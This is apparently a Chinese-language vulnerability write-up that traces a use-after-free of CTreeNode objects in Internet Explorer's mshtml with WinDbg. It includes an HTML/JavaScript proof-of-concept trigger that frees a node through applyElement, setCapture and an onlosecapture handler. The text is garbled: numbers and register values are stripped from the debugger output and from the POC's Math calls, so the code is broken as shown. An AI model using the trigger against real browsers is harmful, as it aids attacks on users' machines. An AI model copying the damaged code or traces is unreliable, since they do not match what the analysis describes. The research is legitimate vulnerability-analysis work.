mshtml!CTreeNode::CTreeNode+0x5c:
6a2bcf2c 85c0 test eax,eax
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf2e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x5e:
6a2bcf2e 0f95c0 setne al
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf31 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x61:
6a2bcf31 c0e003 shl al,
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf34 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x64:
6a2bcf34 32c2 xor al,dl
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf36 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x66:
6a2bcf36 and al,
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf38 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x68:
6a2bcf38 32c2 xor al,dl
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf3a esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6a:
6a2bcf3a mov byte ptr [ecx+],al ds::196e2fb9=
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf3d esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6d:
6a2bcf3d 85ff test edi,edi
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf3f esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x6f:
6a2bcf3f 0f84d65deaff je mshtml!CTreeNode::CTreeNode+0x7c (6a162d1b) [br=]
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf45 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x71:
6a2bcf45 0fb64108 movzx eax,byte ptr [ecx+] ds::196e2fb8=
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf49 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x75:
6a2bcf49 e8ab020000 call mshtml!IsPreLikeTag (6a2bd1f9)
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf4e esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x7e:
6a2bcf4e 33d2 xor edx,edx
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf50 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x80:
6a2bcf50 85c0 test eax,eax
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf52 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x82:
6a2bcf52 0f95c2 setne dl
:>
eax= ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf55 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x85:
6a2bcf55 8bc1 mov eax,ecx
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf57 esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x87:
6a2bcf57 33d6 xor edx,esi
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf59 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x89:
6a2bcf59 83e201 and edx,
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf5c esp=0425e58c ebp=0425e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8c:
6a2bcf5c 33d6 xor edx,esi
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf5e esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x8e:
6a2bcf5e mov dword ptr [ecx+40h],edx ds::196e2ff0=
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi= edi=07824fc8
eip=6a2bcf61 esp=0425e58c ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e pop esi
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcf62 esp=0425e590 ebp=0425e590 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x92:
6a2bcf62 5d pop ebp
:>
eax=196e2fb0 ebx= ecx=196e2fb0 edx= esi=0425e660 edi=07824fc8
eip=6a2bcf63 esp=0425e594 ebp=0425e630 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x93:
6a2bcf63 c20800 ret
:> dd eax
196e2fb0 07824fc8 15171fb0 ffff0075 ffffffff
196e2fc0
196e2fd0
196e2fe0
196e2ff0 d0d0d0d0
196e3000 ???????? ???????? ???????? ????????
196e3010 ???????? ???????? ???????? ????????
196e3020 ???????? ???????? ???????? ????????
:> dd 07824fc8
07824fc8 6a11c2e8 1506efe8
07824fd8 071faeb0
07824fe8 18b1cfe8 0e030ff4
07824ff8 ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> ln 6a11c2e8
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>

同理得document.body.appendChild(id_1);导致了CGenericElement对象的CTreeNode对象建立

<html>
<script>
function trigger()
{
var id_0 = document.createElement("sup");
var id_1 = document.createElement("audio");
document.body.appendChild(id_0);
document.body.appendChild(id_1); Math.tan(,);
id_1.applyElement(id_0);
Math.cos(,);
id_0.onlosecapture=function(e) {
document.write("");
}
Math.sin(,);
id_0['outerText']="";
Math.tan(,);
id_0.setCapture();
Math.cos(,);
id_1.setCapture();
Math.sin(,);
}
window.onload = function() {
trigger();
}
</script>
</html>

修改POC重新下辅助调试语句

:> g
Breakpoint hit
eax= ebx=0441e988 ecx= edx= esi=0441e978 edi=0441e978
eip=6c77d8c0 esp=0441e874 ebp=0441e8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!tan:
6c77d8c0 ff258010756c jmp dword ptr [jscript!_imp__tan (6c751080)] ds::6c751080={msvcrt!tan (773dde34)}

重新下断点

:> bl
e 6c77d8c0 () :**** jscript!tan
e 6a2bced0 () :**** mshtml!CTreeNode::CTreeNode
e 6a2fe563 () :**** mshtml!CTreeNode::Release
e 6a23480f () :**** mshtml!CElement::CElement
e 6a31071b () :**** mshtml!CElement::~CElement
e 6a45673b () :**** mshtml!CElement::applyElement
:> g
Breakpoint hit
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi= edi=
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::applyElement:
6a45673b 8bff mov edi,edi

果然断了下来,看来mshtml就是使用的这个函数对应的js的applyElement

:> g
Breakpoint hit
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi= edi=
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::applyElement:
6a45673b 8bff mov edi,edi
:> dd esp
0441e7ec 6a462da7 06e4efc8 07394fd8 052d5ff4
0441e7fc 0441e878 00810fd0 6a462cbe 6a2b2820
0441e80c 052d5ff4 07394fd8
0441e81c 0441e894 6a32235c 06e4efc8
0441e82c 00810fd0 06eaafd8 0000016c 6a2b2820
0441e83c 05498fe8 0441e870 00810fd0
0441e84c
0441e85c 0441ea68 0000016c 06eaafd8
:> dd 06e4efc8
06e4efc8 6a11c2e8 0738cfe8
06e4efd8 062c5ef0 07337fb0
06e4efe8 075c2f30 06e96ff4
06e4eff8 ???????? ????????
06e4f008 ???????? ???????? ???????? ????????
06e4f018 ???????? ???????? ???????? ????????
06e4f028 ???????? ???????? ???????? ????????
06e4f038 ???????? ???????? ???????? ????????
:> ln 6a11c2e8
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
:> dd 07394fd8
07394fd8 6a627f68 6a2d2fa8 06e42fd8
07394fe8 6a2aaadc
07394ff8 ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> ln 6a627f68
(6a627f68) mshtml!s_apfnTrackerTearoffVtable | (6a6280a0) mshtml!s_fontFamilyMap
Exact matches:
mshtml!s_apfnTrackerTearoffVtable = <no type information>

第一个参数是CGenericElement对象指针,前面我们知道了id_1=CGenericElement

:> r
eax=06eaafd8 ebx=6a628c2c ecx=6a45673b edx=0441e814 esi= edi=
eip=6a45673b esp=0441e7ec ebp=0441e820 iopl= nv up ei pl nz na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CElement::applyElement:
6a45673b 8bff mov edi,edi
:> g
Breakpoint hit
eax= ebx=075c2f30 ecx=063f0754 edx=07392fb0 esi=07392fb0 edi=
eip=6a2fe563 esp=0441e684 ebp=0441e738 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds::07392ff0=
:> dd edx
07392fb0 06e42fd8 ffff0060 ffffffff
07392fc0
07392fd0
07392fe0
07392ff0 d0d0d0d0
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> dd 06e42fd8
06e42fd8 6a0f70e0
06e42fe8 062c5f20 07392fb0
06e42ff8 075c2f30 ???????? ????????
06e43008 ???????? ???????? ???????? ????????
06e43018 ???????? ???????? ???????? ????????
06e43028 ???????? ???????? ???????? ????????
06e43038 ???????? ???????? ???????? ????????
06e43048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

注意,Math.cos(3,4);没有被命中。说明id_1.applyElement(id_0);导致了CPhraseElement(id_0)的CTreeNode释放

:>
eax=06ab8fb0 ebx= ecx=06ab8fb0 edx= esi= edi=06e42fd8
eip=6a2bcf61 esp=0441e664 ebp=0441e668 iopl= nv up ei pl nz na po nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::CTreeNode+0x91:
6a2bcf61 5e pop esi
:> dd eax
06ab8fb0 06e42fd8 077a2fb0 ffff0060 ffffffff
06ab8fc0
06ab8fd0
06ab8fe0
06ab8ff0 d0d0d0d0
06ab9000 ???????? ???????? ???????? ????????
06ab9010 ???????? ???????? ???????? ????????
06ab9020 ???????? ???????? ???????? ????????
:> dd 06e42fd8
06e42fd8 6a0f70e0
06e42fe8 062c5f20
06e42ff8 06ebefe8 ???????? ????????
06e43008 ???????? ???????? ???????? ????????
06e43018 ???????? ???????? ???????? ????????
06e43028 ???????? ???????? ???????? ????????
06e43038 ???????? ???????? ???????? ????????
06e43048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

然后又立即分配了这个对象

:> g
Breakpoint hit
eax= ebx=0441e988 ecx= edx= esi=0441e978 edi=0441e978
eip=6c77d67f esp=0441e874 ebp=0441e8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!cos:
6c77d67f ff259010756c jmp dword ptr [jscript!_imp__cos (6c751090)] ds::6c751090={msvcrt!cos (773d8ace)}

断在辅助语句上

:> g
Breakpoint hit
eax=06eaafd8 ebx=06e42fd8 ecx=063f06ec edx=06ab8fb0 esi=06ab8fb0 edi=06eaafd8
eip=6a2fe563 esp=0441e440 ebp=0441e590 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds::06ab8ff0=
:> dd edx
06ab8fb0 06e42fd8 077a2fb0
06ab8fc0 07337fd8 07382fe0
06ab8fd0 07382fe0 07337fc0
06ab8fe0 07390fe0 07337fd8 07337fd8 07390fe0
06ab8ff0 d0d0d0d0
06ab9000 ???????? ???????? ???????? ????????
06ab9010 ???????? ???????? ???????? ????????
06ab9020 ???????? ???????? ???????? ????????
:> dd 06e42fd8
06e42fd8 6a0f70e0 06aaafe8
06e42fe8 062c5f21 06ab8fb0
06e42ff8 075c2f30 ???????? ????????
06e43008 ???????? ???????? ???????? ????????
06e43018 ???????? ???????? ???????? ????????
06e43028 ???????? ???????? ???????? ????????
06e43038 ???????? ???????? ???????? ????????
06e43048 ???????? ???????? ???????? ????????
:> ln 6a0f70e0
(6a0f70e0) mshtml!CPhraseElement::`vftable' | (6a0f7308) mshtml!CBlockElement::`vftable'
Exact matches:
mshtml!CPhraseElement::`vftable' = <no type information>

可见CPhraseElement的CTreeNode又被释放了,这是由于

id_0.onlosecapture=function(e) {
document.write("");
}

造成的

:> g
Breakpoint hit
eax= ebx=0441e988 ecx= edx= esi=0441e978 edi=0441e978
eip=6c77d711 esp=0441e874 ebp=0441e8b0 iopl= nv up ei pl nz ac pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
jscript!sin:
6c77d711 ff256810756c jmp dword ptr [jscript!_imp__sin (6c751068)] ds::6c751068={msvcrt!sin (773d8aea)}
:> g
Breakpoint hit
eax=0736cfa8 ebx= ecx= edx=07337fb0 esi=07337fb0 edi=06e4efc8
eip=6a2fe563 esp=0441e48c ebp=0441e5e0 iopl= nv up ei pl zr na pe nc
cs=001b ss= ds= es= fs=003b gs= efl=
mshtml!CTreeNode::Release:
6a2fe563 8b4a40 mov ecx,dword ptr [edx+40h] ds::07337ff0=
:> dd edx
07337fb0 06e4efc8 ffff0075 ffffffff
07337fc0
07337fd0 07337fd8
07337fe0 07337fc0 06ab8fd8
07337ff0 d0d0d0d0
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
???????? ???????? ???????? ????????
:> dd 06e4efc8
06e4efc8 6a11c2e8 0738cfe8
06e4efd8 062c5ef0 07337fb0
06e4efe8 075c2f30 06e96ff4
06e4eff8 ???????? ????????
06e4f008 ???????? ???????? ???????? ????????
06e4f018 ???????? ???????? ???????? ????????
06e4f028 ???????? ???????? ???????? ????????
06e4f038 ???????? ???????? ???????? ????????
:> ln 6a11c2e8
(6a11c2e8) mshtml!CGenericElement::`vftable' | (6a254ce0) mshtml!CHeaderElement::`vftable'
Exact matches:
mshtml!CGenericElement::`vftable' = <no type information>
05-11 20:24